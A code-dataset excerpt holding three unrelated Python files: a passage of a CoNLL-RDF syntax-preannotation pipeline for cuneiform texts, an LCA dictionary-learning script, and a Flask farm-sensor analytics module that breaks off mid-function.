- Find a solution for rendering words in SPARQL.
Perhaps, FLASK templates would be the best solution also to corpus-specific
placeholders' rendering.
'''
#
#---/ ANSI 2 HTML /------------------------------------------------------------
#
a2h_conv = Ansi2HTMLConverter()
#
#---/ Variables /--------------------------------------------------------------
#
_path = os.path.dirname(os.path.abspath(__file__))
sp = subprocesses()
#
#---/ CDLI-CoNLL > CONLL-U /---------------------------------------------------
#
class CC2CU(common_functions, CdliCoNLLtoCoNLLUConverter):
'''
Wrapper around CDLI-CoNLL-to-CoNLLU-Converter:
https://github.com/cdli-gh/CDLI-CoNLL-to-CoNLLU-Converter
'''
GIT_CC2CU = 'https://github.com/cdli-gh/CDLI-CoNLL-to-CoNLLU-' \
'Converter.git'
def __init__(self):
self.cdliCoNLLInputFileName = 'CoNLL data'
## self.install_or_upgrade_CC2CU()
self.__reset__()
from cdliconll2conllu.mapping import Mapping
self.cl = Mapping()
self.header = '#%s' %'\t'.join(self.cl.conllUFields)
## print(self.cl.cdliConllFields, len(self.cl.cdliConllFields))
## ## TESTING ONLY:
## for f_name in ['P100149.conll', 'P100159.conll', 'P100188.conll']:
## f_path = os.path.join(_path, 'data', 'cdli-conll', f_name)
## self.convert_CC2CU(f_path)
def install_or_upgrade_CC2CU(self):
'''
Install CC2CU if missing or upgrade it.
'''
sp.run(['pip', 'install', 'git+'+self.GIT_CC2CU, '--upgrade'])
def convert_from_str(self, conll_str):
'''
Convert CDLI-CoNLL to CoNLL-U from CoNLL string.
'''
#print(conll_str)
lines_all = [l.strip() for l in conll_str.splitlines()]
headerLines = [l for l in lines_all if l[0]=='#']
inputLines = [l.split('\t') for l in lines_all if l not in headerLines+['']]
if '\t' in headerLines[-1]:
headerLines = headerLines[:-1]
headerLines.append(self.header)
## for l in inputLines:
## print([l])
self.convertCDLICoNLLtoCoNLLU(inputLines)
#print(self.outputLines, ['\t'.join(l) for l in self.outputLines])
conll_str = '\n'.join(headerLines+['\t'.join(l) for l in self.outputLines])
self.__reset__()
return conll_str
def convert_from_file(self, filename):
'''
Convert CDLI-CoNLL to CoNLL-U from file.
'''
sp.run(['cdliconll2conllu', '-i', filename, '-v'], print_stdout=False)
cdli_conll_u = CC2CU()
#---/ CONLL-U <> CONLL-RDF /---------------------------------------------------
#
class CoNLL2RDF(common_functions):
'''
Wrapper around CoNLL-RDF:
https://github.com/acoli-repo/conll-rdf
'''
GIT_CONLLRDF = 'https://github.com/acoli-repo/conll-rdf.git'
CONLLRDF_PATH = os.path.join(_path, 'conll-rdf')
def __init__(self):
'''
'''
self.add_java_path()
if not os.path.exists(self.CONLLRDF_PATH):
self.install_CONLLRDF()
def add_java_path(self):
'''
Windows: Find and add Java/JDK/bin path to env.
'''
self.JAVA_PATH = None
for b in ['', ' (x86)']:
pf = os.environ['ProgramFiles'].replace(b, '')
basic_java_path = os.path.join(pf, 'Java')
if os.path.exists(basic_java_path):
dirs_lst = os.listdir(basic_java_path)
jdk_lst = [jdk for jdk in dirs_lst if 'jdk' in jdk]
jre_lst = [jre for jre in dirs_lst if 'jre' in jre]
if jdk_lst!=[]:
self.JAVA_JDK_PATH = \
os.path.join(basic_java_path, jdk_lst[-1], 'bin')
self.JAVA_JRE_PATH = \
os.path.join(basic_java_path, jre_lst[-1], 'bin')
break
if not self.JAVA_JDK_PATH:
print(
'''No Java Development Kit installation found! '''
'''Download and install latest:\n'''
'''http://www.oracle.com/technetwork/'''
'''java/javase/downloads/index.html''')
return False
elif self.JAVA_JDK_PATH not in sp.env['PATH']:
sp.env['PATH']+=self.JAVA_JDK_PATH
elif self.JAVA_JRE_PATH not in sp.env['PATH']:
sp.env['PATH']+=self.JAVA_JRE_PATH
self.JAVAC_PATH = os.path.join(self.JAVA_JDK_PATH, 'javac.exe')
return True
def install_CONLLRDF(self):
'''
Install CoNLL-RDF:
1. Clone Github repo
2. Build Java libs
'''
sp.run(['git', 'clone', self.GIT_CONLLRDF])
self.compile_CONLLRDF()
def compile_CONLLRDF(self):
'''
Compile CoNLL-RDF Java libraries.
'''
dep_dict = {
'CoNLLStreamExtractor': 'CoNLL2RDF',
'CoNLLRDFAnnotator': 'CoNLLRDFFormatter',
'CoNLLRDFUpdater': 'CoNLLRDFViz'
}
src_path = os.path.join(
self.CONLLRDF_PATH, 'src', 'org', 'acoli', 'conll', 'rdf')
target_path = os.path.join(self.CONLLRDF_PATH, 'bin')
if not os.path.exists(target_path):
os.mkdir(target_path)
cp_vars = self.java_command(full_path=True, include_bin=True)[-1]
for f in os.listdir(src_path):
if '.java' in f and f.replace('.java', '') in dep_dict.keys():
src_files_path = os.path.join(src_path, f)
dep_src_file_path = os.path.join(src_path,
dep_dict[f.replace('.java', '')])
src_files_lst = [src_files_path, dep_src_file_path+'.java']
cp_path = cp_vars
self.compile_java(src_files_lst,
target_path,
cp_path)
def compile_java(self, src_files_lst, target_path, cp_path, cwd_path=None):
'''
Run Java compiler with command.
'''
self.run([r'%s' %self.JAVAC_PATH,
'-d', r'%s' %target_path,
'-g',
'-cp', r'%s' %cp_path,
]+[r'%s' %f for f in src_files_lst],
cwd_path=cwd_path)
def conll2rdf(self, f_path, columns_typ):
'''
Run Java CoNNL2RDF script to convert CoNLL file to RDF.
'''
#self.define_columns(columns_typ)
command = self.CoNLLStreamExtractor_command() + ['../data/'] \
+ self.columns
self.dump_rdf(rdf_str, f_path)
def rdf2conll(self, columns, f_path=None, stdin_str=None,
decode_stdout=False, target_path=None):
'''
Run Java CoNNL2RDF script to convert CoNLL file to RDF.
'''
#self.define_columns(columns_type)
if f_path==None and stdin_str==None:
print('rdf2conll wrapper: specify path OR string.')
return None
command = self.CoNLLRDFFormatter_command() + ['-conll'] \
+ columns
(CONLLstr, errors) = self.run(
command,
cwd_path=f_path,
stdin_str=stdin_str,
decode_stdout=True)
CONLLstr = CONLLstr.replace(' #', ' \n#') \
.replace('\t#', '\n#').replace('\n\n', '\n')
if target_path:
self.dump(CONLLstr, target_path)
return CONLLstr
def get_stdin(self, stdin_path=None, stdin_str=None): #escape_unicode=False
'''
Get stdin from path or string to use with run.
'''
stdin = ''
if stdin_path==None and stdin_str==None:
return b''
if stdin_path:
with codecs.open(stdin_path, 'r', 'utf-8') as file:
stdin = file.read()
if 'etcsri' in stdin_path and '.conll' in stdin_path:
stdin = self.convert_ETCSRI(stdin)
elif stdin_str:
stdin = stdin_str
if type(stdin)!=bytes:
stdin = stdin.encode('utf-8')
## if escape_unicode==True:
## stdin = self.standardize_translit(stdin)
#print(stdin_str)
return stdin
def run(self, command, cwd_path=None, stdin_path=None, stdin_str=None,
decode_stdout=True):#, escape_unicode=False
'''
Open file, load it to stdin, run command, return stdout.
'''
stdin = self.get_stdin(
stdin_path, stdin_str)#, escape_unicode=escape_unicode)
if not cwd_path:
cwd_path=self.CONLLRDF_PATH
stdout = sp.run(
command,
cwd=cwd_path,
stdin=stdin,
print_stdout=False,
decode_stdout=decode_stdout
)
return self.filter_errors(stdout)
def filter_errors(self, stdout):
'''
Return (real_result, errors_or_warnings).
'''
shell_markers = [b'java.', b'log4j', b'org.apache', b'org.acoli']
typ = type(stdout)
if typ==str:
stdout = stdout.encode('utf-8')
shell_lst = []
for b in stdout.split(b'\n'):
for m in shell_markers:
if m in b:
shell_lst.append(b)
break
stdout_lst = [b for b in stdout.split(b'\n') if b not in shell_lst]
if typ==bytes:
errors = b'\n'.join(shell_lst)
stdout = b'\n'.join(stdout_lst)
## print(stdout.decode('utf-8'))
## print(errors.decode('utf-8'))
elif typ==str:
errors = b'\n'.join(shell_lst).decode('utf-8')
stdout = b'\n'.join(stdout_lst).decode('utf-8')
## print(stdout)
## print(errors)
return (stdout, errors)
def CoNLLStreamExtractor_command(self):
'''
Return a list containing basic command to run CoNLLStreamExtractor
with no additional arguments.
'''
# Make command to run CoNLL2RDF with java
return self.java_command()+['org.acoli.conll.rdf.CoNLLStreamExtractor']
def CoNLLRDFFormatter_command(self):
'''
Return a list containing basic command to run CoNLLRDFFormatter
with no additional arguments.
'''
# Make command to run CoNLL2RDF with java
return self.java_command()+['org.acoli.conll.rdf.CoNLLRDFFormatter']
def java_command(self, full_path=False, include_bin=True):
'''
Return a list containing basic java command to the library.
Set path to 'full' to get full path output.
'''
# Prepare java vatriables
dest = 'bin'
lib_path = os.path.join(self.CONLLRDF_PATH, 'lib')
if full_path==False:
libs = ';'.join(
['lib/%s' %l for l in os.listdir(lib_path)
if '.jar' in l])
elif full_path==True:
dest = os.path.join(self.CONLLRDF_PATH, dest)
libs = ';'.join(
[os.path.join(lib_path, l) for l in os.listdir(lib_path)
if '.jar' in l])
# Make command to run CoNLL2RDF with java
cp = libs
if include_bin==True:
cp = ';'.join([dest, libs])
return ['java', '-cp', cp]
def dump_rdf(self, rdf_str, f_path):
'''
Recieve original path and rdf string, dump to file.
'''
rdf_str = "#new_text" + rdf_str.split("#new_text")[1]
filename = f_path.split('/')[-1].split('.')[0]+'.ttl'
dump_path = os.path.join(_path, 'data', 'conll-rdf', filename)
self.dump(rdf_str, dump_path)
#---/ SYNTAX PREANNOTATION /---------------------------------------------------
#
class syntax_preannotation(CoNLL2RDF):
'''
Class to preannotate turtle files with SPARQL update queries.
Extends ´CoNLL2RDF´.
'''
REQUEST_SRC = [
('remove-IGNORE', 0),
('extract-feats', 1),
('remove-MORPH2', 0),
('init-SHIFT', 1),
## ('REDUCE-adjective', 3),
## ('REDUCE-math-operators', 1), # <- additional rules for admin -
## ('REDUCE-numerals-chain', 6),
## ('REDUCE-time-num', 1),
## ('REDUCE-measurements', 1), # -->
## ('REDUCE-compound-verbs', 1),
## ('REDUCE-adnominal', 3),
## ('REDUCE-appos', 1),
## ('REDUCE-absolutive', 1),
## ('REDUCE-appos', 1), # again?
## ('REDUCE-adjective', 1), # again?
## ('REDUCE-appos', 4), # again?
## ('REDUCE-preposed-genitive', 1),
## ('REDUCE-arguments', 5), # again?
## ('REDUCE-adjective', 1), # again?
## ('REDUCE-to-HEAD', 1),
## ('remove-feats', 1),
('create-ID-and-DEP', 1),
('create-_HEAD', 1)
]
#other possible rules:
# PN <-- N (as in & instead of PN lugal)
# reduce remaining nouns to first verb as nmod (?)
# mu <-- V.MID
# (NU)
# |
# (ADJ) NU
# \ /
# UNIT\
# (...)/ \ (NU)
# ____________BASE__/
# / | | | \
# u4 ki giri iti (us)
# | | | | |
# NU PN PN (diri) mu
# | | | \
# (...) (...) MN V.MID--...
#
#
REQUEST_REMOVE_IGNORE = [
('remove-IGNORE', 1)
]
SPARQL_PATH = os.path.join(_path, 'syntax-preannotation', 'sparql')
OUTPUT_PATH = os.path.join(_path, 'data', 'conll-preannotated')
def __init__(self):
'''
'''
CoNLL2RDF.__init__(self)
def load_requests(self, requests=[]):
'''
Load SPARQL requests to ´self.requests_full_lst´.
Specify repeats from int in ´r[1]´ when it is not ´None´.
'''
requests_lst = []
if requests==[]:
requests = self.REQUEST_SRC
for r in requests:
addit = ''
if r[1]!=None:
repeat = '{%s}' %r[1]
requests_lst.append(
r'%s\%s.sparql%s' %(self.SPARQL_PATH, r[0], repeat))
return requests_lst
def preannotate(self, f_path):
'''
Run SPARQL with ´self.requests_full_lst´ from requests.
First command converts CoNLL to RDF and applies preannotation
rules to it. The second converts the file back to CoNLL.
'''
columns = [
'ID_NUM', 'FORM', 'BASE', 'MORPH2',
'POS', 'EPOS', 'HEAD', 'DEP', 'EDGE']
corpus = 'cdli'
override = {}
if 'etcsri' in f_path:
corpus = 'etcsri'
columns = [
'ID_NUM', 'FORM_ATF', 'BASE', 'MORPH2',
'POS', 'EPOS', 'HEAD', 'DEP', 'EDGE']
override = {
'FORM_ATF': 'FORM'}
c = conll_file(path=f_path, corpus=corpus)
c.configure_str_output(columns, override=override)
rdf_str = self.convert_to_conll_and_preannotate(c)
#print('zzzzzzzzzzzzzzzzz', rdf_str) #<-- PROBLEM HERE !!!! returns b''
filename, target_path, target_path_tree = self.get_path_data(f_path)
self.tree_output(rdf_str, target_path_tree)
conll_str = self.rdf2conll(columns=c.override_columns,
stdin_str=rdf_str, decode_stdout=False)
c.merge_columns_from_conll_str(conll_str, ['HEAD', ('EDGE', 'DEPREL')])
c.configure_str_output(['ID_NUM']+c.COLUMNS_CDLI[1:], override=override)
conll_u = cdli_conll_u.convert_from_str(str(c))+'\n' #<--convert to CoNLL-U
self.dump(conll_u, target_path)
def get_path_data(self, f_path):
'''
'''
filename = os.path.basename(f_path)
target_path = os.path.join(self.OUTPUT_PATH, filename)
target_path_tree = os.path.join(
self.OUTPUT_PATH, '%s_tree.html' %filename.split('.')[0])
return filename, target_path, target_path_tree
def convert_to_conll_and_preannotate(self, conll_obj):
'''
Convert CoNLL to RDF and preannotate with SPARQL.
'''
# !TODO!
# REPLACE ['http://oracc.museum.upenn.edu/etcsri/'] by context!
command = self.CoNLLStreamExtractor_command() \
+ ['http://oracc.museum.upenn.edu/etcsri/'] \
+ conll_obj.override_columns + ['-u'] \
+ self.load_requests()
run_dict={
'command': command, 'stdin_str': str(conll_obj),
'decode_stdout': False}
#, 'escape_unicode': True}
#print(run_dict) #<-- ALL GOOD
(rdf_str, errors) = self.run(**run_dict) #<-- PROBLEM SOMEWHERE HERE !!!! returns b''
print(errors) #Error in Parsing Data: Incorrect XPOSTAG at line:
return rdf_str
def tree_output(self, rdf_str, target_path=''):
'''
Return string with parsed RDF tree representation.
Dump to target_path when it is given.
'''
command = self.CoNLLRDFFormatter_command() + ['-grammar']
(tree_str, errors) = \
self.run(command, stdin_str=rdf_str, decode_stdout=True)
tree_html = a2h_conv.convert(tree_str)
tree_html = tree_html.replace('pre-wrap', 'pre')
if target_path!='':
self.dump(tree_html, target_path)
return tree_str
#---/ COMMANDS /---------------------------------------------------------------
#
'''
Preannotate all files in data/etsri-conll-all, except all errors:
'''
##f_path = os.path.join(_path, 'data', 'etcsri-conll-all')
##sx = syntax_preannotation()
##for f in os.listdir(f_path):
## try:
## sx.preannotate(os.path.join(f_path, f))
## except Exception as e:
## raise e
## pass
'''
Preannotate all files in data/cdli-conll-all, except all errors:
'''
#f_path = os.path.join(_path, 'data', 'etcsri-conll')
#f_path = os.path.join(_path, 'data', 'cdli-jinyan-non-admin') #'etcsri-conll-all')
f_path = os.path.join(_path, 'data', 'cdli-conll-all')
#f_path = os.path.join(_path, 'data', 'evaluate')
preannotated = os.listdir(os.path.join(_path, 'data', 'conll-preannotated'))
exclude = [pa.replace('_tree.html', '.conll') for pa in preannotated if '_tree.html' in pa]
from list_errors import list_files_with_errors
errors_list = list_files_with_errors() # files previusly annotated with errors
sx = syntax_preannotation()
for f in os.listdir(f_path):
if f in errors_list: #f not in exclude
try:
sx.preannotate(os.path.join(f_path, f))
except Exception as e:
raise e
pass
errors_list_new = list_files_with_errors()
print('old_errors', errors_list)
print('new_errors', errors_list_new)
#CC2CU()
#CoNLL2RDF()
#syntax_preannotation()
##c = CoNLL2RDF()
##c.rdf2conll("data\conll-rdf\P100188.ttl")
|
15,611 | 33ea1995a633cadad690139253c7d48b0253fe22 | # -*- coding: utf-8 -*-
"""
Created on Thu Mar 24 16:31:30 2016
@author: Eric
"""
import argparse
import pickle
import LCALearner
import LCAmods
import numpy as np
import scipy.io as io
parser = argparse.ArgumentParser(description="Learn dictionaries for LCA with given parameters.")
parser.add_argument('-o', '--overcompleteness', default=4, type=float)
parser.add_argument('-d', '--data', default='images', type=str)
#parser.add_argument('-d', '--datafile', default='../audition/Data/speech_ptwisecut', type=str)
parser.add_argument('-r', '--resultsfolder', default='',type=str)
parser.add_argument('-s', '--savesuffix', default='', type=str)
parser.add_argument('-i', '--niter', default=200, type=int)
parser.add_argument('-l', '--lam', default=0.6, type=float)
parser.add_argument('--load', action='store_true')
parser.add_argument('--pos', default = False, type=bool)
args=parser.parse_args()
#datafile = args.datafile
data = args.data
resultsfolder = args.resultsfolder
oc = args.overcompleteness
savesuffix = args.savesuffix
niter = args.niter
lam = args.lam
load = args.load
pos = args.pos
if pos:
Learner = LCAmods.PositiveLCA
else:
Learner = LCALearner.LCALearner
if data == 'images':
datafile = '../vision/Data/IMAGES.mat'
numinput = 256
numunits = int(oc*numinput)
data = io.loadmat(datafile)["IMAGES"]
if resultsfolder == '':
resultsfolder = '../vision/Results/'
lca = Learner(data, numunits, paramfile='dummy')
elif data == 'spectros':
datafile = '../audition/Data/speech_ptwisecut'
numinput = 200
numunits = int(oc*numinput)
with open(datafile+'_pca.pickle', 'rb') as f:
mypca, origshape = pickle.load(f)
data = np.load(datafile+'.npy')
data = data/data.std()
if resultsfolder == '':
resultsfolder = '../audition/Results/'
lca = Learner(data, numunits, datatype="spectro", pca = mypca, stimshape=origshape, paramfile='dummy')
lca.min_thresh = lam
lca.max_iter = 1
lca.niter = niter
lca.infrate = 0.01
lca.learnrate = 0.0005
savestr = resultsfolder+str(oc)+'OC' + str(lam) + savesuffix
if load:
lca.load(savestr + '.pickle')
lca.save(savestr+'.pickle')
lca.run(ntrials=50000)
lca.run(ntrials=200000, rate_decay=.99995)
lca.save()
|
15,612 | f409d01479fadd84ee7e223cd70a76231b34cb08 | """
Analysis dashboards module.
"""
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import copy
from datetime import datetime, timedelta
import json
import logging
import re
import numpy as np
import pandas as pd
from flask_login import login_required
from flask import render_template, request
from sqlalchemy import and_
from app.dashboards import blueprint
from cropcore import queries
from cropcore.utils import (
download_csv,
parse_date_range_argument,
query_result_to_array,
)
from cropcore.structure import SQLA as db
from cropcore.structure import (
SensorClass,
TypeClass,
ReadingsAegisIrrigationClass,
ReadingsEnergyClass,
ReadingsAranetCO2Class,
ReadingsAranetTRHClass,
ReadingsAranetAirVelocityClass,
)
from cropcore.constants import CONST_MAX_RECORDS, CONST_TIMESTAMP_FORMAT
# Temperature constants
TEMP_BINS = {
"Propagation": [0.0, 20.0, 23.0, 25.0, 144.0],
"FrontFarm": [0.0, 18.0, 21.0, 25.0, 144.0],
"Fridge": [0.0, 20.0, 23.0, 25.0, 144.0],
"MidFarm": [0.0, 20.0, 23.0, 25.0, 144.0],
"BackFarm": [0.0, 20.0, 25.0, 28.0, 144.0],
"Tunnel": [0.0, 20.0, 25.0, 28.0, 144.0],
"R&D": [0.0, 20.0, 23.0, 25.0, 144.0],
}
# TODO Read these from the database.
SENSOR_CATEORIES = {
18: "MidFarm",
19: "Tunnel",
20: "Propagation",
21: "FrontFarm",
22: "BackFarm",
23: "MidFarm",
24: "R&D",
25: "R&D",
26: "Fridge",
27: "MidFarm",
48: "Propagation",
49: "R&D",
}
# Ventilation constants
CONST_SFP = 2.39 # specific fan power
CONST_VTOT = 20337.0 # total volume – m3
DEFAULT_SENSOR_TYPE = "Aranet T&RH"
# Some data that varies based on sensor type.
# DATA_COLUMNS_BY_SENSOR_TYPE names the class for the readings table.
DATA_TABLES_BY_SENSOR_TYPE = {
"Aranet T&RH": lambda: queries.trh_with_vpd(db.session).subquery().c,
"Aranet CO2": lambda: ReadingsAranetCO2Class,
"Aranet Air Velocity": lambda: ReadingsAranetAirVelocityClass,
"Aegis II": lambda: ReadingsAegisIrrigationClass,
}
# DATA_COLUMNS_BY_SENSOR_TYPE names the columns of that table that we want to plot as
# data, and gives them human friendly names to display on the UI.
# TODO Could the below data be read from the database?
DATA_COLUMNS_BY_SENSOR_TYPE = {
"Aranet T&RH": [
{"column_name": "temperature", "ui_name": "Temperature (°C)"},
{"column_name": "humidity", "ui_name": "Humidity (%)"},
{"column_name": "vpd", "ui_name": "VPD (Pa)"},
],
"Aranet CO2": [
{"column_name": "co2", "ui_name": "CO2 (ppm)"},
],
"Aranet Air Velocity": [
{"column_name": "air_velocity", "ui_name": "Air velocity (m/s)"},
],
"Aegis II": [
{"column_name": "temperature", "ui_name": "Temperature (°C)"},
{"column_name": "pH", "ui_name": "pH"},
{"column_name": "dissolved_oxygen", "ui_name": "Dissolved oxygen (%)"},
{"column_name": "conductivity", "ui_name": "Conductivity (μS)"},
{"column_name": "turbidity", "ui_name": "Turbidity"},
{"column_name": "peroxide", "ui_name": "Peroxide (ppm)"},
],
}
# The above constants are defined in terms of names of the sensor_types. The code
# operates in terms of ids rather than names, so we wrap the above dictionaries into
# functions.
def get_sensor_type_name(sensor_type_id):
"""Given a sensor type ID, get the name of the sensor type from the database."""
query = db.session.query(
TypeClass.sensor_type,
).filter(TypeClass.id == sensor_type_id)
sensor_name = db.session.execute(query).fetchone()
if isinstance(sensor_name, Iterable):
sensor_name = sensor_name[0]
return sensor_name
def get_sensor_type_id(sensor_type_name):
"""Given a sensor type name, get the ID of the sensor type from the database."""
query = db.session.query(
TypeClass.id,
).filter(TypeClass.sensor_type == sensor_type_name)
sensor_id = db.session.execute(query).fetchone()
if isinstance(sensor_id, Iterable):
sensor_id = sensor_id[0]
return sensor_id
def get_table_by_sensor_type(sensor_type_id):
"""Return the SQLAlchemy table/subquery corresponding to a given sensor type ID."""
# Because of how global constants work in Flask, DATA_COLUMNS_BY_SENSOR_TYPE has
# functions that return the relevant table/subquery, rather than the
# tables/subqueries themselves. Hence the calls like `value()` and setting
# `value = lambda: None`
global DATA_TABLES_BY_SENSOR_TYPE
if sensor_type_id in DATA_TABLES_BY_SENSOR_TYPE:
return DATA_TABLES_BY_SENSOR_TYPE[sensor_type_id]()
else:
sensor_type_name = get_sensor_type_name(sensor_type_id)
if sensor_type_name in DATA_TABLES_BY_SENSOR_TYPE:
value = DATA_TABLES_BY_SENSOR_TYPE[sensor_type_name]
else:
value = lambda: None
DATA_TABLES_BY_SENSOR_TYPE[sensor_type_id] = value
return value()
def get_columns_by_sensor_type(sensor_type_id):
"""Return the names of the data columns in the table corresponding to a given sensor
type ID.
By "data columns" we mean the ones that depend on the sensor type and hold the
actual data, e.g. temperature and humidity, but not timestamp. The return values are
dictionaries with two keys, "column_name" for the name by which the database knows
this column, and "ui_name" for nice human-readable name fit for a UI.
"""
global DATA_COLUMNS_BY_SENSOR_TYPE
if sensor_type_id in DATA_COLUMNS_BY_SENSOR_TYPE:
return DATA_COLUMNS_BY_SENSOR_TYPE[sensor_type_id]
else:
sensor_type_name = get_sensor_type_name(sensor_type_id)
if sensor_type_name in DATA_COLUMNS_BY_SENSOR_TYPE:
value = DATA_COLUMNS_BY_SENSOR_TYPE[sensor_type_name]
else:
value = None
DATA_COLUMNS_BY_SENSOR_TYPE[sensor_type_id] = value
return value
def get_default_sensor_type():
"""Get the ID of the default sensor type."""
return get_sensor_type_id(DEFAULT_SENSOR_TYPE)
def is_valid_sensor_type(sensor_type_id):
"""Return True if we have the necessary metadata about the table and its columns
needed for fetching and plotting data for the given sensor type, otherwise False.
"""
return (
get_table_by_sensor_type(sensor_type_id) is not None
and get_columns_by_sensor_type(sensor_type_id) is not None
)
# # # DONE WITH GLOBAL CONSTANTS AND SENSOR TYPE METADATA, BEGIN MAIN CONTENT # # #
def resample(df, bins, dt_from, dt_to):
"""
Resamples (adds missing date/temperature bin combinations) to a dataframe.
Arguments:
df: dataframe with temperature assign to bins
bins: temperature bins as a list
dt_from: date range from
dt_to: date range to
Returns:
bins_list: a list of temperature bins
df_list: a list of df corresponding to temperature bins
"""
bins_list = []
for i in range(len(bins) - 1):
bins_list.append("(%.1f, %.1f]" % (bins[i], bins[i + 1]))
date_min = min(df["date"].min(), dt_from)
date_max = max(df["date"].max(), dt_to)
for n in range(int((date_max - date_min).days) + 1):
day = date_min + timedelta(n)
for temp_range in bins_list:
if len(df[(df["date"] == day) & (df["temp_bin"] == temp_range)].index) == 0:
df2 = pd.DataFrame(
{"date": [day], "temp_bin": [temp_range], "temp_cnt": [0]}
)
df = df.append(df2)
df = df.sort_values(by=["date", "temp_bin"], ascending=True)
df.reset_index(inplace=True, drop=True)
df_list = []
for bin_range in bins_list:
df_bin = df[df["temp_bin"] == bin_range]
del df_bin["temp_bin"]
df_bin.reset_index(inplace=True, drop=True)
df_list.append(df_bin)
return bins_list, df_list
def lights_energy_use(dt_from_, dt_to_):
"""
Energy use from Carpenter's place (with lights - called Clapham in the database)
Arguments:
dt_from_: date range from
dt_to_: date range to
Returns:
lights_results_df - a pandas dataframe with mean lights on values
"""
dt_from = pd.to_datetime(dt_from_.date()) + timedelta(hours=14)
dt_to = pd.to_datetime(dt_to_.date()) + timedelta(days=1, hours=15)
d_from = pd.to_datetime(dt_from_.date())
d_to = pd.to_datetime(dt_to_.date())
col_ec = "electricity_consumption"
sensor_device_id = "Clapham"
lights_on_cols = []
# getting eneregy data for the analysis
query = db.session.query(
ReadingsEnergyClass.timestamp,
ReadingsEnergyClass.electricity_consumption,
).filter(
and_(
SensorClass.device_id == sensor_device_id,
ReadingsEnergyClass.sensor_id == SensorClass.id,
ReadingsEnergyClass.timestamp >= dt_from,
ReadingsEnergyClass.timestamp <= dt_to,
)
)
df = pd.read_sql(query.statement, query.session.bind)
if df.empty:
return pd.DataFrame({"date": [], "mean_lights_on": []})
# Reseting index
df.sort_values(by=["timestamp"], ascending=True).reset_index(inplace=True)
# grouping data by date-hour
energy_hour = (
df.groupby(
by=[
df["timestamp"].map(
lambda x: pd.to_datetime(
"%04d-%02d-%02d-%02d" % (x.year, x.month, x.day, x.hour),
format="%Y-%m-%d-%H",
)
),
]
)["electricity_consumption"]
.sum()
.reset_index()
)
# Sorting and reseting index
energy_hour.sort_values(by=["timestamp"], ascending=True).reset_index(inplace=True)
# energy dates. Energy date starts from 4pm each day and lasts for 24 hours
energy_hour.loc[
energy_hour["timestamp"].dt.hour < 15, "energy_date"
] = pd.to_datetime((energy_hour["timestamp"] + timedelta(days=-1)).dt.date)
energy_hour.loc[
energy_hour["timestamp"].dt.hour >= 15, "energy_date"
] = pd.to_datetime(energy_hour["timestamp"].dt.date)
# Clasification of lights being on
# Lights ON 1: Lights turn on at 4pm and turn off at 9am, as scheduled.
energy_hour["lights_on_1"] = energy_hour["timestamp"].apply(
lambda x: 1 if (x.hour >= 17 or x.hour < 10) else 0
)
lights_on_cols.append("lights_on_1")
# Lights ON 2: Lights are calculated by estimating the lighting use as between
# the minima of two consecutive days. The lights are considered on when the
# energy use is above the day's first quartile of lighting of this difference.
# energy_hour['lights_on_2'] = 0
# lights_on_cols.append('lights_on_2')
# Lights ON 3: Lights are assumed to be on if the energy demand is over 30 kW
# (max load of the extraction fan)
energy_hour["lights_on_3"] = energy_hour[col_ec].apply(
lambda x: 1 if (x > 30.0) else 0
)
lights_on_cols.append("lights_on_3")
# Lights ON 4: Lights are assumed to turn on at the time of largest energy use
# increase in the day, and turn off at the time of largest energy decrease of
# the day.
# estimating energy difference
energy_hour["dE"] = energy_hour[col_ec] - energy_hour[col_ec].shift(1)
energy_hour["dE"] = energy_hour["dE"].fillna(0.0)
# finding max increase and min decrease
energy_hour["dE_min"] = energy_hour.groupby("energy_date")["dE"].transform("min")
energy_hour["dE_max"] = energy_hour.groupby("energy_date")["dE"].transform("max")
energy_hour.loc[
np.isclose(energy_hour["dE_max"], energy_hour["dE"]), "lights_on_4"
] = 1
energy_hour.loc[
np.isclose(energy_hour["dE_min"], energy_hour["dE"]), "lights_on_4"
] = 0
# repeat last?
prev_row_value = None
for df_index in energy_hour.index:
if df_index > 0:
if np.isnan(energy_hour.loc[df_index, "lights_on_4"]) and not np.isnan(
prev_row_value
):
energy_hour.loc[df_index, "lights_on_4"] = prev_row_value
prev_row_value = energy_hour.loc[df_index, "lights_on_4"]
lights_on_cols.append("lights_on_4")
# Lights ON 5: Lights are assumed on if the energy use is over 0.9
# times the days' energy use mean, and the energy demand is over 30 kW.
energy_hour["energy_date_mean"] = energy_hour.groupby("energy_date")[
col_ec
].transform("mean")
energy_hour["lights_on_5"] = np.where(
(energy_hour[col_ec] > 30.0)
& (energy_hour[col_ec] > 0.9 * energy_hour["energy_date_mean"]),
1,
0,
)
lights_on_cols.append("lights_on_5")
# getting the mean value of lights on per day
energy_date_df = energy_hour.loc[
(energy_hour["energy_date"] >= d_from) & (energy_hour["energy_date"] <= d_to)
]
energy_date_df = (
energy_date_df.groupby(by=["energy_date"])[lights_on_cols].sum().reset_index()
)
energy_date_df["mean_lights_on"] = energy_date_df[lights_on_cols].sum(axis=1) / len(
lights_on_cols
)
energy_date_df["date"] = energy_date_df["energy_date"].dt.strftime("%Y-%m-%d")
lights_results_df = energy_date_df[["date", "mean_lights_on"]]
return lights_results_df
def ventilation_energy_use(dt_from, dt_to):
"""
In our data this is called Carpenter’s Place. This reading only counts energy use for
the second extraction fan.
Arguments:
dt_from: date range from
dt_to: date range to
Returns:
ventilation_results_df - a pandas dataframe with ventilation analysis results
"""
sensor_device_id = "1a Carpenters Place"
# getting eneregy data for the analysis
query = db.session.query(
ReadingsEnergyClass.timestamp,
ReadingsEnergyClass.electricity_consumption,
).filter(
and_(
SensorClass.device_id == sensor_device_id,
ReadingsEnergyClass.sensor_id == SensorClass.id,
ReadingsEnergyClass.timestamp >= dt_from,
ReadingsEnergyClass.timestamp <= dt_to,
)
)
df = pd.read_sql(query.statement, query.session.bind)
if df.empty:
return pd.DataFrame({"timestamp": [], "ach": []})
# Reseting index
df.sort_values(by=["timestamp"], ascending=True).reset_index(inplace=True)
# grouping data by date-hour
energy_hour = (
df.groupby(
by=[
df["timestamp"].map(
lambda x: "%04d-%02d-%02d %02d:00"
% (x.year, x.month, x.day, x.hour)
),
]
)["electricity_consumption"]
.sum()
.reset_index()
)
# Sorting and reseting index
energy_hour.sort_values(by=["timestamp"], ascending=True).reset_index(inplace=True)
# Calculating air exchange per hour
energy_hour["ach"] = (
energy_hour["electricity_consumption"] / CONST_SFP * 3600.0 / (CONST_VTOT / 2.0)
)
ventilation_results_df = energy_hour[["timestamp", "ach"]]
return ventilation_results_df
def aranet_trh_analysis(dt_from, dt_to):
"""
Performs data analysis for Aranet Temperature+Relative Humidity sensors.
